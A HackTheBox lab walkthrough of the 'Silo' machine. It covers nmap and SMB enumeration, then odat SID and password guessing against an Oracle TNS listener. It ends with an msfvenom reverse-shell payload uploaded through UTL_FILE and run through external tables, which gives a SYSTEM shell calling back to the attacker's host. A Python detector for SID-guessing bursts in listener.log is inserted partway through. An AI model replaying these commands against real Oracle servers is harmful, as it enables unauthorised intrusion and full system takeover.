
HTB - Silo

Silo is a vulnerable virtual machine created by egre55 on HackTheBox. In this post, we document a complete walkthrough of pwning this machine.

Enumeration

Nmap

Starting with an nmap scan, we discover that the target is running Windows Server 2008 R2. Available services include HTTP (IIS 8.5), SMB and an Oracle TNS listener on port 1521/tcp.

$ nmap -sC -sV -oA recon/default 10.10.10.82

Nmap scan report for 10.10.10.82
Host is up (0.10s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1m32s, deviation: 0s, median: -1m32s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-12-16T04:49:30
|_  start_date: 2020-12-16T04:45:54

HTTP

Browsing web pages on the target, we only find a default IIS welcome page. We perform a directory fuzzing with ffuf, but nothing of interest is found.

$ ffuf -u http://10.10.10.82/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -c

aspnet_client           [Status: 301, Size: 156, Words: 9, Lines: 2]

SMB

We try to list smb shares with null session authentication but get a STATUS_ACCESS_DENIED.

$ crackmapexec smb 10.10.10.82 -u '' -p '' --shares
SMB         10.10.10.82     445    SILO             [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)
SMB         10.10.10.82     445    SILO             [-] SILO\: STATUS_ACCESS_DENIED

Exploitation

Oracle TNS Listener

A general guide to attacking the service can be found here. We will use odat for this task. On Kali it can be installed with apt; the GitHub repo has more up-to-date versions if we need them.

$ sudo apt install odat

First, we need to find a valid SID. The Oracle System ID (SID) is a unique identifier for every database instance on the system; it can be thought of as a unique database name.

$ odat sidguesser -s 10.10.10.82 -p 1521
[1] (10.10.10.82:1521): Searching valid SIDs

...

[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB

With the above odat command, we have found two valid SIDs. Next, we try to enumerate login credentials for them, starting with a small wordlist that ships with odat. Shortly, we find valid credentials for the database.

$ sudo odat passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file /usr/share/odat/accounts/accounts_small.txt
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521

...

[+] Accounts found on 10.10.10.82:1521/XE: 
scott/tiger
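Both guessing steps above (the SID guess and the credential guess that follows it) show up on the database host as a burst of connection attempts in the listener's listener.log, where a request for an SID the listener does not know is recorded with return code 12505. The following Python is an added detection example written for this post; it is not part of the original walkthrough or of odat. The log lines it parses are constructed in the shape of Oracle's listener.log "establish" records (the timestamps, PORT and PROGRAM values are made up), and the 60-second window and 5-SID threshold are assumptions to tune for your environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# One "establish" line as written by the Oracle listener to listener.log. Field layout
# after the timestamp: connect data * client address * event * SID/service * return code.
# Return code 12505 means the listener does not know the requested SID.
ESTABLISH_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* "
    r"\(CONNECT_DATA=.*?\) \* "
    r"\(ADDRESS=\(PROTOCOL=\w+\)\(HOST=(?P<host>[^)]+)\)\(PORT=\d+\)\) \* "
    r"establish \* (?P<sid>\S+) \* (?P<rc>\d+)$"
)
UNKNOWN_SID = 12505


def parse_establish_lines(text):
    """Return a list of dicts, one per establish line; other lines (TNS-xxxxx
    continuation lines, banner text) are ignored."""
    events = []
    for line in text.splitlines():
        m = ESTABLISH_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S"),
            "host": m["host"],
            "sid": m["sid"],
            "rc": int(m["rc"]),
        })
    return events


def detect_sid_guessing(events, window_s=60, min_unknown_sids=5):
    """Flag source hosts that asked for at least `min_unknown_sids` distinct unknown
    SIDs within any `window_s`-second window. Returns {host: [sids tried]}."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_host[e["host"]].append(e)
    alerts = {}
    for host, evs in by_host.items():
        worst = set()
        for i, start in enumerate(evs):  # sliding window over this host's events
            unknown = set()
            for e in evs[i:]:
                if (e["ts"] - start["ts"]).total_seconds() > window_s:
                    break
                if e["rc"] == UNKNOWN_SID:
                    unknown.add(e["sid"])
            if len(unknown) > len(worst):
                worst = unknown
        if len(worst) >= min_unknown_sids:
            alerts[host] = sorted(worst)
    return alerts


def reached_sids(events, host):
    """SIDs the host connected to successfully (rc 0): the ones whose audit trail
    should be checked next for follow-on password guessing."""
    return sorted({e["sid"] for e in events if e["host"] == host and e["rc"] == 0})


def _line(ts, src, sid, rc):
    # Constructed listener.log line in the real field layout; PORT and PROGRAM are dummies.
    return (f"{ts} * (CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * "
            f"(ADDRESS=(PROTOCOL=tcp)(HOST={src})(PORT=50001)) * establish * {sid} * {rc}")


# Constructed sample: one host (10.10.14.18) tries six wrong SIDs in six seconds, then
# hits the two valid ones; a second host (10.10.10.5) makes two ordinary connections.
GUESSED = ["ORCL", "TEST", "DEV", "PROD", "DB1", "SILO"]
SAMPLE_LOG = "\n".join(
    [_line(f"16-DEC-2020 04:45:{10 + i:02d}", "10.10.14.18", sid, UNKNOWN_SID)
     for i, sid in enumerate(GUESSED)]
    + ["TNS-12505: TNS:listener does not currently know of SID given in connect descriptor"]
    + [_line("16-DEC-2020 04:45:20", "10.10.14.18", "XE", 0),
       _line("16-DEC-2020 04:45:21", "10.10.14.18", "XEXDB", 0),
       _line("16-DEC-2020 04:47:00", "10.10.10.5", "XE", 0),
       _line("16-DEC-2020 04:52:00", "10.10.10.5", "XE", 0)]
)

if __name__ == "__main__":
    evs = parse_establish_lines(SAMPLE_LOG)
    for host, sids in detect_sid_guessing(evs).items():
        print(f"SID guessing from {host}: {len(sids)} unknown SIDs {sids}; "
              f"valid SIDs reached: {reached_sids(evs, host)}")
```

On a real system, point parse_establish_lines at the listener's own listener.log instead of SAMPLE_LOG. The flagged host's successful SIDs are the place to look next: once the guesser has a valid SID, its password attempts no longer fail at the listener but inside the database, so they appear as failed logons (return code 1017) in DBA_AUDIT_SESSION when session auditing is enabled, not in listener.log.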

Having valid credentials, we can begin our exploitation. First, we check if the java module is available, which is the easiest way to achieve RCE.

$ sudo odat java -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --sysdba --test-module

[1] (10.10.10.82:1521): Test if the DBMSScheduler library can be used
[1.1] JAVA library ?
[-] KO

It seems that we get KO’ed. Next, we try the dbmsscheduler module.

$ sudo odat dbmsscheduler -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --sysdba --test-module

[1] (10.10.10.82:1521): Test if the DBMSScheduler library can be used
[1.1] DBMSSCHEDULER library ?
[-] KO

And we are KO’ed again. What about the externaltable module?

$ sudo odat externaltable -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --sysdba --test-module

[1] (10.10.10.82:1521): Test if the External Table module can be used
[1.1] External table to read files ?
[+] OK
[1.2] External table to execute system commands ?
[+] OK

Sweet, we finally find a way to achieve RCE. To go this route we also need another module, utlfile, to write the file that externaltable will execute.

$ sudo odat utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --sysdba --test-module

[1] (10.10.10.82:1521): Test if the UTL_FILE library can be used
[1.1] UTL_FILE library ?
[+] OK

Now that we can both write files and execute them, we generate our payload with msfvenom.

$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.18 lport=4444 -f exe -o rev.exe

We kindly upload our completely-not-malicious little program to the target.

$ sudo odat utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --sysdba --putFile c:/windows/temp rev.exe `pwd`/rev.exe

[1] (10.10.10.82:1521): Put the /home/kali/silo/rev.exe local file in the c:/windows/temp folder like rev.exe on the 10.10.10.82 server
[+] The /home/kali/silo/rev.exe file was created on the c:/windows/temp directory on the 10.10.10.82 server like the rev.exe file

We execute our payload with the externaltable module. After that, odat hangs, which is a good sign: the reverse shell it spawned keeps the command from returning.

$ sudo odat externaltable -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --sysdba --exec c:/windows/temp rev.exe

[1] (10.10.10.82:1521): Execute the rev.exe command stored in the c:/windows/temp path

Looking at our ncat listener, we get a reverse shell. We check our privileges and find that we are already NT AUTHORITY\SYSTEM: the Oracle service runs as SYSTEM, so no privilege escalation is needed. Pwned.

$ rlwrap ncat -nlvp 4444

...

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system

This post is licensed under CC BY 4.0 by the author.